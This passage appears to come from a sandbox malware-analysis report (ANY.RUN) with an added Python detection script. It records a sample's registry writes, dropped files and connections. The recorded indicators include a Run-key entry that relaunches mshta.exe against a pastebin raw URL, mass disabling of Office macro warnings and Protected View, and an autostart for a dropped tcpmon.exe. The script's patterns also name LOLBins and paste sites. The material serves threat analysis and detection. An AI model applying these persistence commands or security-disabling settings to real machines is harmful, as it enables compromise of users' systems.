c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll

PID
2104
CMD
"{path}"
Path
C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
Indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
MSBuild.exe
Version
2.0.50727.5420 built by: Win7SP1
Modules
Image
c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\system32\shell32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\profapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.drawing\dbfe8642a8ed7b2b103ad28e0c96418a\system.drawing.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.windows.forms\3afcd5168c7a6cb02eab99d7fd71e102\system.windows.forms.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.visualbas#\08d608378aa405adc844f3cf36974b8c\microsoft.visualbasic.ni.dll
c:\windows\system32\uxtheme.dll
c:\windows\assembly\gac_msil\system.windows.forms\2.0.0.0__b77a5c561934e089\system.windows.forms.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\shfolder.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\microsoft.net\framework\v2.0.50727\diasymreader.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\psapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll

Registry activity

Total events
669
Read events
498
Write events
171
Delete events
0

Modification events

PID Process Operation Key Name Value
3952 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap UNCAsIntranet 0
3952 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap AutoDetect 1
3952 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings ProxyEnable 0
3952 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections SavedLegacySettings ––
3952 mshta.exe write HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E LanguageList en-US
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap UNCAsIntranet 0
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap AutoDetect 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings ProxyEnable 0
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections SavedLegacySettings 4600000078000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
2632 mshta.exe write HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E LanguageList en-US
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AvastUpdate mshta.exe http://pastebin.com/raw/0zUiMTze
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Security VBAWarnings 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Security VBAWarnings 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security VBAWarnings 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Security VBAWarnings 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security VBAWarnings 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\PowerPoint\Security VBAWarnings 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\PowerPoint\Security VBAWarnings 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\PowerPoint\Security VBAWarnings 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\PowerPoint\Security VBAWarnings 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\PowerPoint\Security VBAWarnings 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Excel\Security VBAWarnings 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Excel\Security VBAWarnings 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security VBAWarnings 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Excel\Security VBAWarnings 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security VBAWarnings 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Security\ProtectedView DisableInternetFilesInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Security\ProtectedView DisableAttachementsInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Security\ProtectedView DisableUnsafeLocationsInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView DisableInternetFilesInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView DisableAttachementsInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView DisableUnsafeLocationsInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView DisableInternetFilesInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView DisableAttachementsInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView DisableUnsafeLocationsInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Security\ProtectedView DisableInternetFilesInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Security\ProtectedView DisableAttachementsInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Security\ProtectedView DisableUnsafeLocationsInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView DisableInternetFilesInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView DisableAttachementsInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView DisableUnsafeLocationsInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView DisableInternetFilesInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView DisableAttachementsInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView DisableUnsafeLocationsInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\ProtectedView DisableInternetFilesInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\ProtectedView DisableAttachementsInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\ProtectedView DisableUnsafeLocationsInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView DisableInternetFilesInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView DisableAttachementsInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView DisableUnsafeLocationsInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView DisableInternetFilesInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView DisableAttachementsInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView DisableUnsafeLocationsInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Security\ProtectedView DisableInternetFilesInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Security\ProtectedView DisableAttachementsInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Security\ProtectedView DisableUnsafeLocationsInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView DisableInternetFilesInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView DisableAttachementsInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView DisableUnsafeLocationsInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView DisableInternetFilesInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView DisableAttachementsInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView DisableUnsafeLocationsInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security\ProtectedView DisableInternetFilesInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security\ProtectedView DisableAttachementsInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security\ProtectedView DisableUnsafeLocationsInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView DisableInternetFilesInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView DisableAttachementsInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView DisableUnsafeLocationsInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView DisableInternetFilesInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView DisableAttachementsInPV 1
2632 mshta.exe write HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView DisableUnsafeLocationsInPV 1
3720 powershell.exe write HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E LanguageList en-US
3720 powershell.exe write HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 EnableFileTracing 0
3720 powershell.exe write HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 EnableConsoleTracing 0
3720 powershell.exe write HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 FileTracingMask 4294901760
3720 powershell.exe write HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 ConsoleTracingMask 4294901760
3720 powershell.exe write HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 MaxFileSize 1048576
3720 powershell.exe write HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 FileDirectory %windir%\tracing
3720 powershell.exe write HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS EnableFileTracing 0
3720 powershell.exe write HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS EnableConsoleTracing 0
3720 powershell.exe write HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS FileTracingMask 4294901760
3720 powershell.exe write HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS ConsoleTracingMask 4294901760
3720 powershell.exe write HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS MaxFileSize 1048576
3720 powershell.exe write HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS FileDirectory %windir%\tracing
2104 MSBuild.exe write HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run TCP Monitor C:\Users\admin\AppData\Roaming\90059C37-1320-41A4-B58D-2B75A9850D2F\TCP Monitor\tcpmon.exe
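The modification events above carry the detection-relevant behaviour of this sample: mshta.exe (PID 2632) writes a Run value named AvastUpdate that relaunches mshta.exe against a pastebin raw URL, sets VBAWarnings to 1 (enable all macros) for Word, PowerPoint and Excel 11.0 through 16.0, and sets all three Protected View disable flags for the same versions; MSBuild.exe (PID 2104) then registers tcpmon.exe from a GUID-named directory under %APPDATA% as "TCP Monitor". The Python below is an added example and not ANY.RUN's code: it runs rule logic over a constructed subset of those rows in (pid, process, operation, key, name, data) form. The rule names, the LOLBin and paste-site lists, and the assumption that only Office binaries legitimately write Office security keys are mine, not the report's.

```python
"""Rule logic over registry write events of the kind listed in the
"Modification events" table. Added example, not ANY.RUN code. The rule
names, the LOLBin/paste-site lists and the assumption that only Office
binaries legitimately write Office security keys are assumptions."""
import re
from collections import Counter
from dataclasses import dataclass

# Constructed sample: a subset of the report's rows as
# (pid, process, operation, key, value name, data).
SAMPLE_EVENTS = [
    ("3952", "mshta.exe", "write",
     r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap",
     "AutoDetect", "1"),
    ("2632", "mshta.exe", "write",
     r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
     "AvastUpdate", "mshta.exe http://pastebin.com/raw/0zUiMTze"),
    ("2632", "mshta.exe", "write",
     r"HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security",
     "VBAWarnings", "1"),
    ("2632", "mshta.exe", "write",
     r"HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView",
     "DisableInternetFilesInPV", "1"),
    ("3720", "powershell.exe", "write",
     r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32",
     "EnableFileTracing", "0"),
    ("2104", "MSBuild.exe", "write",
     r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
     "TCP Monitor",
     r"C:\Users\admin\AppData\Roaming\90059C37-1320-41A4-B58D-2B75A9850D2F\TCP Monitor\tcpmon.exe"),
]

RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?$", re.IGNORECASE)
OFFICE_SECURITY = re.compile(
    r"\\Software\\Microsoft\\Office\\(?P<ver>\d+\.\d)\\"
    r"(?P<app>Word|Excel|PowerPoint|Access|Outlook|Publisher)\\Security"
    r"(?P<pv>\\ProtectedView)?$", re.IGNORECASE)
# Script hosts and build tools that should not appear in a Run value (assumption).
LOLBIN = re.compile(
    r"\b(mshta|powershell|pwsh|wscript|cscript|rundll32|regsvr32|certutil|msbuild|bitsadmin)(\.exe)?\b",
    re.IGNORECASE)
PASTE_SITE = re.compile(r"https?://(www\.)?(pastebin\.com|paste\.ee|hastebin\.com)/", re.IGNORECASE)
# %APPDATA%\<GUID>\ is the drop layout seen in this report.
APPDATA_GUID = re.compile(
    r"\\AppData\\(Roaming|Local)\\\{?[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\}?\\",
    re.IGNORECASE)
# VBAWarnings 1 = "enable all macros"; these three PV values set to 1 turn Protected View off.
PV_DISABLE = {"DisableInternetFilesInPV", "DisableAttachementsInPV", "DisableUnsafeLocationsInPV"}
OFFICE_BINARIES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}


@dataclass(frozen=True)
class Finding:
    pid: str
    process: str
    rule: str
    detail: str


def detect(events):
    """Return one Finding per matched rule for every registry write."""
    findings = []
    for pid, proc, op, key, name, data in events:
        if op.lower() != "write":
            continue
        if RUN_KEY.search(key):
            if LOLBIN.search(data) or PASTE_SITE.search(data):
                findings.append(Finding(pid, proc, "run_key_lolbin_or_paste", f"{name} = {data}"))
            if APPDATA_GUID.search(data):
                findings.append(Finding(pid, proc, "run_key_appdata_guid_dir", f"{name} = {data}"))
        m = OFFICE_SECURITY.search(key)
        if m:
            if name.lower() == "vbawarnings" and data == "1":
                findings.append(Finding(pid, proc, "office_macros_enabled", f"{m['app']} {m['ver']}"))
            elif m["pv"] and name in PV_DISABLE and data == "1":
                findings.append(Finding(pid, proc, "office_protected_view_disabled",
                                        f"{m['app']} {m['ver']} {name}"))
            if proc.lower() not in OFFICE_BINARIES:
                findings.append(Finding(pid, proc, "office_security_written_by_non_office", key))
    return findings


def summarize(findings):
    """Rule name -> hit count, handy for a triage one-liner."""
    return dict(Counter(f.rule for f in findings))


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f.pid:>5} {f.process:<15} {f.rule:<40} {f.detail}")
    print(summarize(detect(SAMPLE_EVENTS)))
```

Against the full table the Office rules fire 15 times for VBAWarnings and 45 times for Protected View, which is the sort of volume that separates a deliberate hardening rollback from a user toggling one setting; the powershell.exe RAS tracing writes are normal .NET networking noise and match nothing.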

Files activity

Executable files
1
Suspicious files
4
Text files
23
Unknown types
0

Dropped files

PID Process Filename Type MD5 SHA256
2104 MSBuild.exe C:\Users\admin\AppData\Roaming\90059C37-1320-41A4-B58D-2B75A9850D2F\TCP Monitor\tcpmon.exe executable MD5: 1f13cd7f1ecb2a7bcc1ff5e287b7eb2e SHA256: 6adc88fc0a0e108851909618442c03f57cdfc20f6db4ee88b84c0caf420f991f
3952 mshta.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\error[1] html MD5: 16aa7c3bebf9c1b84c9ee07666e3207f SHA256: 7990e703ae060c241eba6257d963af2ecf9c6f3fbdb57264c1d48dda8171e754
3720 powershell.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF16798a.TMP binary MD5: 53c936f15ba0e898ca1bdceb3ae9c5fb SHA256: d7c26fc9ff2065d126d4339d2c20d865b8b2a8399ab7f0a1a3b06f7ad1a36c95
3720 powershell.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms binary MD5: 53c936f15ba0e898ca1bdceb3ae9c5fb SHA256: d7c26fc9ff2065d126d4339d2c20d865b8b2a8399ab7f0a1a3b06f7ad1a36c95
3720 powershell.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LZY4SIKB9W7NO2CS8I4D.temp –– MD5: –– SHA256: ––
2632 mshta.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\LhpqPv66[1].txt html MD5: b28affe02fc84afedbf60d4fa2b7a33a SHA256: d01f745202e9e9d5b381da37aff123ff4d797a2c7e359e8dd7a7c80277db226c
2632 mshta.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt text MD5: f8ddfb2732f917f714fd74f1cf3b9f8b SHA256: a9d321016a42e2b98155c0bbe44307c7b1bda4e5e0d6e817cabecfa6c271b386
3952 mshta.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\navbar[1].g –– MD5: –– SHA256: ––
3952 mshta.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\warning[1] image MD5: 124a9e7b6976f7570134b7034ee28d2b SHA256: 5f95eff2bcaaea82d0ae34a007de3595c0d830ac4810ea4854e6526e261108e9
3952 mshta.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\error[1] text MD5: 35fe91c2ac1ba0913cc617622b9eb43f SHA256: 966240c0527b20e8e2553b7e5a68594ae69230aa00186f2c6c2c342405494837
3952 mshta.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\logo-16[1].png image MD5: 5ffecab6c722bb0adc3fce8d83b27993 SHA256: cca664ca16fde285160e80eae6ba4501c27b1dd1ce09aec1e84caa74b5baff53
3952 mshta.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\share_buttons_20_3[1].png image MD5: ad9999106d5f550920b586e8e1704e5a SHA256: 3829a5b2ade7cfc416c80b8f3df71e49e68672875f025d525223978f5cee3fd3
3952 mshta.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\warning[1] –– MD5: –– SHA256: ––
3952 mshta.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\error[1] –– MD5: –– SHA256: ––
3952 mshta.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\cb=gapi[1].loaded_3 text MD5: 5c2b6131b59b6397a81f1ed46ba585fe SHA256: a2996100c95e3166c48c9cab4f56485c23efff0dde1dd4e51069203d4a3bc58a
3952 mshta.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\8[1].html html MD5: 5d9434c53de484260e658001e71df812 SHA256: a1950f682e83af4b3a5ad6e0a46fa9ec3b4f331d4748180e2a4165a3c6c9e432
3952 mshta.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\cb=gapi[1].loaded_2 text MD5: dfca983f4b2afd0472667416b99e0f9a SHA256: b88d9432a00cfa0d6cfdc1f55ad27e75b029b638075c68e1de32eb5a5dc0b943
3952 mshta.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\icon18_edit_allbkg[1].gif image MD5: c991641178ff05adf0d004298b5eafa9 SHA256: ca9848e6006cfec8f9ffa29433ade8152204bdb95579200831c6dc0f53dff70b
3952 mshta.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\body_gradient_tile_light[1].png image MD5: 3b2a20d5b0ba4ca0c5dd90865ad6b9c4 SHA256: 0fdcb4746995f0d5240e5ec11370cb950722a894f3cff4118aa68ccc92010edd
3952 mshta.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\f[1].txt text MD5: 7f5f2be159837d73b72a4b37616bce44 SHA256: ccecd185ac16ba0a538840f37701053fbb861f7fbbdd86039c7415fcd924d1f2
3952 mshta.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\cb=gapi[1].loaded_1 text MD5: 3046a593032c278f7f52826c7c4cfd3b SHA256: 270910e368e3e8eaf6b7292f9950778cb4cb1fb81093abdbbc8247449f15d265
3952 mshta.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\1501421786-widgets[1].js text MD5: 65cab1da9a68d9fc06c0ceea26e1879f SHA256: 75033e75836de28af64fa0abcdeec178df9db9446a09bea2a8e9e72958466b4b
3952 mshta.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\cookienotice[1].js text MD5: a705132a2174f88e196ec3610d68faa8 SHA256: 068ffe90977f2b5b2dc2ef18572166e85281bd0ecb31c4902464b23db54d2568
3952 mshta.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\cb=gapi[1].loaded_0 text MD5: bfa01245364b163772bfa3067c5dd6c3 SHA256: e15c2b291ba23bb646ca27e52853b1fb305b60e1ef40c51530b8a2b18bdcff82
3952 mshta.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\1646370754-comment_from_post_iframe[1].js html MD5: 9ee08ad2448d931c3350f8efb31b9583 SHA256: 045a89da56e925603d6ae87bd25c68a06487b706cb75cd41138614995118d32e
3952 mshta.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\authorization[1].css binary MD5: 68b329da9893e34099c7d8ad5cb9c940 SHA256: 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
3952 mshta.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\plusone[1].js html MD5: 5c7a692db43dd1e7299db0274a7559e9 SHA256: 941a23db972131dde66171968f6b847416dfe037e9f3a143f2b9c729b41a625c
3952 mshta.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt text MD5: 44818242875d0a2e462858428d9ac4aa SHA256: dc4f4a342b1a19951f169cfa3eb7be1be1de9cb30f38d2a4cc82472282ee8912
3952 mshta.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\3399642339-ieretrofit[1].js html MD5: be2b0433b22d6fc049f1b2d75daaf7fa SHA256: 7186786ed5a17b3db11b7be7b4eff0e2a95fde616d81e68fee6530f7523fb6e9
3952 mshta.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\3597120983-css_bundle_v2[1].css text MD5: ac004ad1eafc60b54fed8371c9c33fbc SHA256: 869176cab64c36f92c6c1f8ffbe85919575d6b9995a54850e5925289f3a75078
2104 MSBuild.exe C:\Users\admin\AppData\Roaming\90059C37-1320-41A4-B58D-2B75A9850D2F\run.dat binary MD5: 25e5bf700c76d46907917ba13793034b SHA256: 685a90f7ba4b6f4be42661ec6fd00d212708c732fda4bf9bc055d2c6b51efff6

Find more information about the static content and download it in the full report

Network activity

HTTP(S) requests
1
TCP/UDP connections
51
DNS requests
33
Threats
15

HTTP requests

PID Process Method HTTP Code IP URL CN Type Size Reputation
2632 mshta.exe GET 301 104.20.208.21:80 http://www.pastebin.com/raw/LhpqPv66 US html –– shared

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID Process IP ASN CN Reputation
3952 mshta.exe 172.217.23.129:443 Google Inc. US whitelisted
3952 mshta.exe 172.217.21.233:443 Google Inc. US whitelisted
3952 mshta.exe 172.217.21.206:443 Google Inc. US whitelisted
3952 mshta.exe 172.217.16.162:443 Google Inc. US whitelisted
3952 mshta.exe 216.58.210.9:443 Google Inc. US whitelisted
3952 mshta.exe 172.217.16.173:443 Google Inc. US whitelisted
3952 mshta.exe 172.217.18.99:443 Google Inc. US whitelisted
2632 mshta.exe 104.20.208.21:80 Cloudflare Inc US shared
2632 mshta.exe 104.20.209.21:443 Cloudflare Inc US shared
3720 powershell.exe 104.20.209.21:443 Cloudflare Inc US shared
2104 MSBuild.exe 8.8.8.8:53 Google Inc. US whitelisted
